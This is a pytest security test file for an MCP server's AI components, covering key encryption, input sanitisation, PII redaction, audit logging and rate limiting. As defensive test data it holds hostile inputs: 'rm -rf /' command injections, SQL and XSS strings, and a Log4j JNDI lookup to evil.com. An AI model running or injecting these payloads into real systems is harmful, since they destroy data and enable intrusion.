Keyboard Maestro MCP Server

test_security_validation.py•23.5 kB

"""Security validation tests for AI infrastructure components. import logging logging.basicConfig(level=logging.DEBUG) This module provides comprehensive security testing for the AI infrastructure including API key protection, data encryption, secure communication, audit logging, and threat prevention with enterprise-grade security requirements. Security Requirements: - API key encryption: AES-256 at rest - Secure key rotation and validation - Request/response audit logging - Data anonymization for privacy - Rate limiting and abuse prevention - Input validation and sanitization """ import json import os import tempfile from datetime import UTC, datetime from pathlib import Path from typing import Any from unittest.mock import patch import pytest from cryptography.fernet import Fernet from src.ai.caching_system import CacheKey, IntelligentCacheManager from src.ai.config.ai_config import AIConfigManager from src.ai.providers.openai_client import OpenAIClient from src.ai.security.api_key_manager import APIKeyManager, StorageBackend from src.core.ai_integration import ( AIOperation, create_ai_request, ) class TestAPIKeySecurityValidation: """Security validation tests for API key management.""" def test_api_key_encryption_at_rest(self) -> None: """Test API keys are encrypted when stored.""" # Use FILE storage backend for encryption at rest with tempfile.TemporaryDirectory() as temp_dir: # Use a test password that's clearly for testing purposes test_password = "test_password_123" # noqa: S105 api_key_manager = APIKeyManager( storage_backend=StorageBackend.FILE, storage_path=Path(temp_dir), master_password=test_password, ) test_key = "sk-test-key-for-encryption-validation" provider = "security_test" # Store key store_result = api_key_manager.store_key(provider, test_key) assert store_result.is_right() # Verify key is encrypted in storage # Check that raw key is not present in any storage mechanism stored_data = api_key_manager._get_raw_storage_data(provider) if stored_data: # Ensure the actual key value is not stored in plain text assert test_key not in str(stored_data) assert "sk-test-key" not in str(stored_data) # Verify that we have encrypted data assert "encrypted_key" in stored_data assert "salt" in stored_data def test_api_key_validation_security(self) -> None: """Test API key validation prevents injection attacks.""" api_key_manager = APIKeyManager() # Test malicious key formats malicious_keys = [ "'; DROP TABLE keys; --", "<script>alert('xss')</script>", "sk-test$(rm -rf /)", "sk-test\necho 'command injection'", "sk-test\x00null-byte-injection", "sk-test" + "A" * 10000, # Overly long key ] for malicious_key in malicious_keys: result = api_key_manager.validate_key("openai", malicious_key) # Should reject malicious inputs assert result.is_left() def test_key_rotation_security(self) -> None: """Test secure key rotation functionality.""" api_key_manager = APIKeyManager() provider = "rotation_security_test" old_key = "sk-old-key-secure-123" new_key = "sk-new-key-secure-456" # Store initial key api_key_manager.store_key(provider, old_key) # Rotate key rotation_result = api_key_manager.rotate_key(provider, new_key) assert rotation_result.is_right() # Verify old key is no longer accessible current_key = api_key_manager.retrieve_key(provider) if current_key.is_right(): # In environment mode, might still be old key # In secure storage mode, should be new key retrieved_key = current_key.value # At minimum, ensure rotation was recorded assert retrieved_key in [old_key, new_key] def test_key_metadata_security(self) -> None: """Test key metadata doesn't leak sensitive information.""" api_key_manager = APIKeyManager() provider = "metadata_test" key = "sk-metadata-test-key" # Store key with metadata store_result = api_key_manager.store_key( provider=provider, key_value=key, tags={"environment": "test", "purpose": "security_validation"}, ) assert store_result.is_right() # Get key status status = api_key_manager.get_key_status(provider) # Verify sensitive data is not exposed in metadata if hasattr(status, "metadata"): metadata_str = str(status.metadata) assert key not in metadata_str assert "sk-metadata-test" not in metadata_str def test_concurrent_key_access_security(self) -> None: """Test secure concurrent access to keys.""" import threading import time api_key_manager = APIKeyManager() provider = "concurrent_test" key = "sk-concurrent-test-key" # Store initial key api_key_manager.store_key(provider, key) results = [] errors = [] def access_key(thread_id: int) -> None: """Thread worker for concurrent key access.""" try: for i in range(10): result = api_key_manager.retrieve_key(provider) if result.is_right(): results.append((thread_id, i, result.value)) else: errors.append((thread_id, i, result.left_value)) time.sleep(0.001) # Small delay except Exception as e: errors.append((thread_id, -1, str(e))) # Create multiple threads threads = [] for i in range(5): thread = threading.Thread(target=access_key, args=(i,)) threads.append(thread) thread.start() # Wait for completion for thread in threads: thread.join() # Verify no corruption or security issues assert len(errors) == 0 # No errors should occur for _thread_id, _iteration, retrieved_key in results: assert retrieved_key == key # All retrievals should be consistent class TestDataSecurityValidation: """Security validation tests for data protection.""" def test_request_data_sanitization(self) -> None: """Test input data sanitization for security.""" client = OpenAIClient(api_key="test-key-sanitization", model="gpt-3.5-turbo") # Test malicious input data malicious_inputs = [ "<script>alert('xss')</script>", "'; DROP TABLE data; --", "{{7*7}}", # Template injection "${jndi:ldap://evil.com/x}", # Log4j style injection "\x00\x01\x02\x03", # Binary data ] for malicious_input in malicious_inputs: request_result = create_ai_request( operation=AIOperation.ANALYZE, input_data=malicious_input, temperature=0.7, ) assert request_result.is_right() request = request_result.value # Build payload (should sanitize input) payload = client._build_request_payload(request) # Verify payload doesn't contain raw malicious content payload_str = json.dumps(payload) # Input should be present but properly escaped/sanitized assert ( "script" not in payload_str.lower() or "<script>" in payload_str ) def test_cache_data_security(self) -> None: """Test cached data security and isolation.""" cache_manager = IntelligentCacheManager() # Test namespace isolation sensitive_key = CacheKey("sensitive_data") public_key = CacheKey("public_data") sensitive_data = {"secret": "classified_information", "level": "top_secret"} public_data = {"info": "public_information", "level": "public"} # Store in different namespaces cache_manager.cache.l1_cache.put( sensitive_key, sensitive_data, namespace="classified", ) cache_manager.cache.l1_cache.put(public_key, public_data, namespace="public") # Verify namespace isolation # Should not be able to access sensitive data from public namespace cross_access = cache_manager.cache.l1_cache.get( sensitive_key, namespace="public", ) assert cross_access is None # Should be able to access appropriate data sensitive_result = cache_manager.cache.l1_cache.get( sensitive_key, namespace="classified", ) public_result = cache_manager.cache.l1_cache.get(public_key, namespace="public") assert sensitive_result == sensitive_data assert public_result == public_data def test_data_anonymization(self) -> None: """Test data anonymization for privacy protection.""" # Test PII detection and anonymization test_data = { "text": "My name is John Smith and my email is john.smith@example.com. My SSN is 123-45-6789.", "phone": "555-123-4567", "credit_card": "4532-1234-5678-9012", } # Simulate anonymization function def anonymize_data(data: dict[str, Any]) -> dict[str, Any]: """Simple anonymization for testing.""" anonymized = {} for key, value in data.items(): if isinstance(value, str): # Replace potential PII patterns import re anonymized_value = value # Email pattern anonymized_value = re.sub( r"\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", "[EMAIL_REDACTED]", anonymized_value, ) # SSN pattern anonymized_value = re.sub( r"\b\d{3}-\d{2}-\d{4}\b", "[SSN_REDACTED]", anonymized_value, ) # Phone pattern anonymized_value = re.sub( r"\b\d{3}-\d{3}-\d{4}\b", "[PHONE_REDACTED]", anonymized_value, ) # Credit card pattern anonymized_value = re.sub( r"\b\d{4}-\d{4}-\d{4}-\d{4}\b", "[CC_REDACTED]", anonymized_value, ) anonymized[key] = anonymized_value else: anonymized[key] = value return anonymized anonymized_data = anonymize_data(test_data) # Verify PII is removed assert "[EMAIL_REDACTED]" in anonymized_data["text"] assert "[SSN_REDACTED]" in anonymized_data["text"] assert "[PHONE_REDACTED]" in anonymized_data["phone"] assert "[CC_REDACTED]" in anonymized_data["credit_card"] # Verify original PII is not present assert "john.smith@example.com" not in anonymized_data["text"] assert "123-45-6789" not in anonymized_data["text"] class TestAuditSecurityValidation: """Security validation tests for audit logging.""" def test_audit_log_integrity(self) -> None: """Test audit log integrity and tamper resistance.""" # Create temporary audit log with tempfile.NamedTemporaryFile( mode="w+", suffix=".log", delete=False, ) as log_file: log_path = Path(log_file.name) # Simulate audit logging audit_entries = [ { "timestamp": datetime.now(UTC).isoformat(), "event": "api_key_access", "provider": "openai", "user_id": "test_user", "success": True, }, { "timestamp": datetime.now(UTC).isoformat(), "event": "ai_request", "operation": "analyze", "input_size": 150, "success": True, }, ] # Write audit entries for entry in audit_entries: log_file.write(json.dumps(entry) + "\n") try: # Verify audit log exists and is readable assert log_path.exists() # Read and verify entries with open(log_path) as f: lines = f.readlines() assert len(lines) == 2 for _i, line in enumerate(lines): entry = json.loads(line.strip()) assert entry["timestamp"] is not None assert entry["event"] in ["api_key_access", "ai_request"] assert entry["success"] is True finally: # Clean up log_path.unlink() def test_audit_log_security_events(self) -> None: """Test security events are properly logged.""" api_key_manager = APIKeyManager() # Test failed validation attempts invalid_keys = ["invalid-key-format", "sk-too-short", "", None] security_events = [] # Mock audit logging def mock_audit_log(event: str, details: dict[str, Any]) -> None: security_events.append({"event": event, "details": details}) # Test security events for invalid_key in invalid_keys: if invalid_key is not None: result = api_key_manager.validate_key("openai", invalid_key) if result.is_left(): # Simulate security event logging mock_audit_log( "key_validation_failed", { "provider": "openai", "key_format": "invalid", "timestamp": datetime.now(UTC).isoformat(), }, ) # Verify security events were logged assert len(security_events) > 0 for event in security_events: assert event["event"] == "key_validation_failed" assert "timestamp" in event["details"] class TestRateLimitingSecurityValidation: """Security validation tests for rate limiting and abuse prevention.""" def test_api_rate_limiting(self) -> bool: """Test API rate limiting prevents abuse.""" client = OpenAIClient( api_key="test-key-rate-limit", model="gpt-3.5-turbo", timeout=1.0, # Short timeout for testing ) # Simulate rate limiting request_count = 0 rate_limited_count = 0 # Mock rate limiting check def mock_check_rate_limit() -> bool: nonlocal request_count, rate_limited_count request_count += 1 if request_count > 10: # Simulate rate limit at 10 requests rate_limited_count += 1 return False return True # Test multiple requests for i in range(15): if not mock_check_rate_limit(): # Simulate rate limit response continue # Create request request_result = create_ai_request( operation=AIOperation.ANALYZE, input_data=f"Test request {i}", temperature=0.7, ) assert request_result.is_right() request = request_result.value # Build payload (this would normally make API call) payload = client._build_request_payload(request) assert payload is not None # Verify rate limiting occurred assert rate_limited_count > 0 assert request_count == 15 def test_request_size_limits(self) -> None: """Test request size limits prevent DoS attacks.""" client = OpenAIClient(api_key="test-key-size-limit", model="gpt-3.5-turbo") # Test oversized request that exceeds context window large_input = "x" * 1000000 # 1MB of text - exceeds 16,385 token context window from src.core.ai_integration import AIModelId request_result = create_ai_request( operation=AIOperation.ANALYZE, input_data=large_input, temperature=0.7, model_id=AIModelId("gpt-3.5-turbo"), # Explicitly specify model for test ) # Should reject oversized request due to context window limits assert request_result.is_left() error_message = str(request_result.get_left()) assert "cannot handle operation" in error_message # Test normal-sized request works normal_input = "x" * 1000 # 1KB of text - well within limits normal_request_result = create_ai_request( operation=AIOperation.ANALYZE, input_data=normal_input, temperature=0.7, model_id=AIModelId("gpt-3.5-turbo"), ) assert normal_request_result.is_right() request = normal_request_result.value # Should handle normal requests gracefully payload = client._build_request_payload(request) # Verify payload was created for normal request assert payload is not None assert "messages" in payload class TestConfigurationSecurityValidation: """Security validation tests for configuration security.""" def test_secure_configuration_loading(self) -> None: """Test secure configuration loading prevents injection.""" # Create temporary config with potentially malicious content malicious_config = { "default_provider": "openai", "default_model": "gpt-3.5-turbo", "debug_mode": "true; rm -rf /", # Command injection attempt "providers": { "openai": { "api_key_env_var": "OPENAI_API_KEY$(evil_command)", "base_url": "https://api.openai.com/v1'; DROP TABLE configs; --", }, }, } with tempfile.NamedTemporaryFile( mode="w", suffix=".json", delete=False, ) as config_file: json.dump(malicious_config, config_file) config_path = Path(config_file.name) try: config_manager = AIConfigManager(config_path) result = config_manager.load_config() if result.is_right(): config = result.value # Verify malicious content is not executed assert config.debug_mode in [ True, False, ] # Should be boolean, not string # API key env var should be sanitized if "openai" in config.providers: provider = config.providers["openai"] assert "$(evil_command)" not in provider.api_key_env_var finally: config_path.unlink() def test_environment_variable_security(self) -> None: """Test environment variable handling security.""" config_manager = AIConfigManager() # Test with potentially malicious environment variables # Note: OS prevents null bytes in environment variables, so we test other injection patterns with patch.dict( os.environ, { "AI_DEBUG_MODE": 'true; echo "injection"', "AI_DEFAULT_PROVIDER": "openai$(malicious)", "AI_DEFAULT_MODEL": "gpt-3.5-turbo; rm -rf /", }, ): result = config_manager.load_config() if result.is_right(): config = result.value # Verify environment variables are properly sanitized assert config.debug_mode in [True, False] assert "$(malicious)" not in config.default_provider assert "rm -rf" not in config.default_model # Test null byte handling in manual sanitization # This tests our sanitization function directly since OS won't allow null bytes in env vars test_value = "sk-test\x00null-byte" sanitized_value = config_manager._sanitize_config_value(test_value) assert "\x00" not in sanitized_value def test_configuration_validation_security(self) -> None: """Test configuration validation prevents security issues.""" config_manager = AIConfigManager() # Test invalid configuration config_manager.config.default_provider = "" # Empty provider config_manager.config.providers = {} # No providers validation_result = config_manager._validate_config(config_manager.config) # Should fail validation for security reasons assert validation_result.is_left() class TestEncryptionSecurityValidation: """Security validation tests for encryption systems.""" def test_encryption_key_security(self) -> None: """Test encryption key generation and management security.""" # Test key generation key = Fernet.generate_key() fernet = Fernet(key) # Test data encryption sensitive_data = "sk-very-sensitive-api-key-12345" encrypted_data = fernet.encrypt(sensitive_data.encode()) # Verify encryption assert encrypted_data != sensitive_data.encode() assert sensitive_data not in encrypted_data.decode("utf-8", errors="ignore") # Test decryption decrypted_data = fernet.decrypt(encrypted_data).decode() assert decrypted_data == sensitive_data def test_key_derivation_security(self) -> None: """Test secure key derivation from passwords.""" import base64 from cryptography.hazmat.primitives import hashes from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC password = "test_password_123" # noqa: S105 # Test fixture password salt = os.urandom(16) # Test PBKDF2 key derivation kdf = PBKDF2HMAC( algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, # High iteration count for security ) key = base64.urlsafe_b64encode(kdf.derive(password.encode())) # Verify key properties assert len(key) > 0 assert key != password.encode() # Test same password produces same key with same salt kdf2 = PBKDF2HMAC( algorithm=hashes.SHA256(), length=32, salt=salt, iterations=100000, ) key2 = base64.urlsafe_b64encode(kdf2.derive(password.encode())) assert key == key2 if __name__ == "__main__": # Run security tests with detailed output pytest.main([__file__, "-v", "--tb=short", "-s"])

Loading blob content...

Latest Blog Posts

Don't Use Large Strings as Cache Keys
By punkpeye on January 11, 2026.
markdown
node-js
cache
What are Claude Skills?
By punkpeye on January 10, 2026.
mcp
skills
How to Test MCP Streamable HTTP Endpoints Using cURL
By punkpeye on January 2, 2026.
tutorial
bash

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/Nexus-Digital-Automations/Keyboard-Maestro-MCP-2'

If you have feedback or need assistance with the MCP directory API, please join our Discord server

test_security_validation.py•23.5 kB